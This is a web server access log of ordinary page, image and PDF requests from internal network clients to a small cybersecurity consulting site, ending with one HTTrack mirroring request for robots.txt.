192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775340 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /bcp.html HTTP/1.1" 200 6651 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1" 200 111181 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1" 200 57269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1" 200 5011 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5012 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /contact.html HTTP/1.1" 200 6976 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45953 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765195 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /backblue.gif HTTP/1.1" 304 182 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /fade.gif HTTP/1.1" 304 181 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5012 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /risk.html HTTP/1.1" 200 6606 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5012 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265419 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5012 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1" 200 1045139 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /incident.html HTTP/1.1" 200 6621 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1" 200 99002 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1" 200 59026 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1" 200 5011 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] "GET /robots.txt HTTP/1.1" 404 503 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
